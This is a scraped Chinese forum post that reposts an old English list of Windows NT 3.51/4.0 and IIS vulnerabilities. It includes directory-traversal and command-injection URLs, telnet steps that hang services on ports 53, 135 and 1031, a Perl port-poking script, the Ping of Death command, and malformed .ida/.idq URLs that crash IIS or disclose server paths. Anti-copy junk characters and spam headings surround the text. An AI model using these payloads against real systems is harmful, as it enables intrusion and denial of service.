天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標題: NT的漏洞及描述(英文) [打印本頁]
      

      
作者: 雜七雜八    時間: 2011-1-13 17:12
      
標題: NT的漏洞及描述(英文)
      受影響系統(tǒng):4.0,iis 1.0* k  M: r2 E* P8 y$ l
      
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.9 C8 b' o, |/ R; y0 I/ a5 R
      

      
7 L2 d9 o0 ~+ ^( p* S; M" wA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      
' W; H4 Z# [9 w4 u0 z: H# G) ^
      
2 O' |# ^% P) {7 p- p4 BBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
      
9 M* S% u% s$ N6 z  X: D- ]
      
% n* Y0 T3 Y1 H3 k$ H--------------------------------------------------------------------9 n' z' b7 d6 |
      
6 N% c4 \9 ?' u/ d1 N
      
受影響系統(tǒng):4.0$ t4 f0 N+ O; q3 O
      
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      
8 ~: x4 W0 d1 \. @  v% [
      
9 ]; f2 G/ E* R( P  n- KIf the file 'target.bat' exists, the file will be truncated.
      
7 }+ \+ L8 a$ Y/ R7 F8 z1 W( z4 i/ v" T
      
8 V; P/ O, D9 h4 L- H8 _1 S
      
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.3 i$ i; s: T" E3 ^
      
% r& t' n# ?( p/ o% b8 k$ c5 f6 P0 C
      
----------------------------------------------------------------------
      
: j7 B1 H2 s1 k- D9 u
      
: v/ `5 z8 ?. N/ j: k9 h4 j3 Q受影響系統(tǒng):3.51,4.0
      
( V4 e6 U  v- _& |; {' W! B* jMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      
& q; L" s* G+ d+ C* f+ m, h/ \) ~6 e  ?6 s( s
      
The following steps;
      
1 A# h& T5 q; Y7 p3 u
      
( H. \8 D7 m! c  K/ W) J0 dTelnet to an NT 4.0 system on port 135 ; y, s( Y  M: ^# Z! P0 U
      
Type about 10 characters followed by a <CR> 
      
& e9 D: K+ |3 E; t, w- }Exit Telnet * o, {6 N: N( t# `/ ~- ~3 Q
      
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      
& @9 R! c) s" f" r; V8 B/ r. H2 ^) h+ p) A5 v) l* q
      
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.4 N( E" C4 h- X5 s( n. j1 B
      

      
( Y8 K  v  W5 `1 t# tThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
      
. t( K! X4 z- }1 d6 v3 N9 Y7 J& u/ `* Y' X( Z& p
      
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
      
& x1 w4 T, W9 {" g: E
      
8 q4 H% v/ ^& H5 M& qThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
      
0 M, ]+ B2 W: R% ?- q  K3 k; N
      
& O3 b4 A1 C; F& l8 i9 y3 G# O/*begin poke code*/
      
, f4 H1 ~2 M5 ]( M2 _
      
) x& I  j* K1 Quse Socket;6 L2 b& f8 w8 S
      
use FileHandle;# B; E, O+ f* c9 I. c
      
require "chat2.pl";
      
9 y4 K* Q0 c1 N9 X- x  U3 q+ L
      
: O! z+ U+ G, b, s" E$systemname = $ARGV[0] && shift;/ J: m# ]1 B0 e- O
      

      
4 A3 B  T- D. E" l( n; M: d* ~8 a$verbose = 1; # tell me what you're hitting6 U7 C! I" H7 R  e+ d3 M5 Q
      
$knownports = 1; # don't hit known problem ports
      
, l) H3 u, m- X: p: C' yfor ($port = $0; $port<65535; $port++) ; U% Y1 X! X' A* Q7 N
      
{& I. Y# R4 o8 @  N+ t5 |
      
* K0 b! D4 x9 z4 ^4 M
      
! I: w  P( z" `& t; e
      
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
      
& A2 y  Z) `+ R9 g3 e6 a# tnext;9 Z9 B) h* p: V5 k" W( y2 F
      
}  u" ]3 l5 E: w7 H  j
      
$fh = chat::open_port($systemname, $port);* K5 _/ t: y9 k% K- Y
      
chat::print ($fh,"This is about ten characters or more");
      
5 K/ Z; J( I* `2 ~$ O4 Wif ($verbose) {
      
1 [% n2 h2 i5 x+ Eprint "Trying port: $port\n";  A0 Q, P! G  @
      
} & t, Y& A- O& M/ G, J; k! C& e
      
chat::close($fh);
      
6 S! x0 {- w' l0 J+ T4 F# f! p
      
8 i: c% `  k/ g- I) H; k9 E}2 h5 R8 l8 I5 _; X
      

      
8 J- n, F& p2 `! k& T. a# v# E& v) K- }% f: m
      
/*end poke code*/; O" r' ~2 M: [& t. W" W, p  Z& b
      
! t. H# {  y9 U0 ]" I
      
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
      
) ]5 B* w7 S) r- N( a+ n& M1 G. g, o9 Y0 l3 k' w8 x/ J- V0 Y% [
      
--------------------------------------------------------------------------------2 ?. u( _/ ^* ^* B
      
3 ^9 h1 [5 ~" E
      
受影響系統(tǒng):4.0# Q; D. Q, N. Z8 i. n' ~/ ?. p
      
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
      
8 ~( i* T7 C# k! L2 {4 X; [: j2 X$ K6 ~; g6 x, m3 J' j
      
This attack causes Dr. Watson to display an alert window and to log an error: 
      
: t3 O  K8 G: W% U3 ?4 p) o9 N( u) \( F0 t
      
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"% P7 C9 W" Z$ l* ~5 v3 R8 l) {
      
8 `% k; E; K& D& @2 W/ J. b5 s
      
--------------------------------------------------------------------------------  T  D# \; u  k- V1 i
      
1 ^# ^& l& ^7 H9 p2 J
      
受影響系統(tǒng):3.51,4.0
      
+ P/ e8 o8 j' [8 `6 |Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:$ L( R* J0 V  c; w7 C
      

      
' p7 x7 ~2 N4 J- Y8 }STOP: 0X0000001E
      
& j; l7 z" ^* i( _* hKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
      
" I$ V  ?5 Y  I: \2 i0 a! t* s" H+ |
      
7 t7 E" b3 y0 y! M-OR-
      
9 \$ w* F# }3 u- |* O- ^. I" x5 J0 V0 M3 T
      
2 w$ Z1 I" G2 b- s& A9 USTOP: 0x0000000A
      
" S- C3 P3 y% n- sIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
      
5 i9 C- C: \1 p7 t, L; z
      
  h5 M6 I; i: @3 k; ?: hNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      
$ [9 L! d& ?( s( K# M" R, T6 K9 c1 p" J* B% c. s
      
--------------------------------------------------------------------------------
      
1 g% h' I: ?2 d" {' P: z1 w7 s  J4 _
      
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). 
      
2 c% \! e$ o( U/ `0 }& _3 k2 x6 B7 G
      
--------------------------------------------------------6 E+ T5 T0 B! S- _! M% {# U8 O3 q4 u
      
" d: D+ Z0 @  P3 c; t
      
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5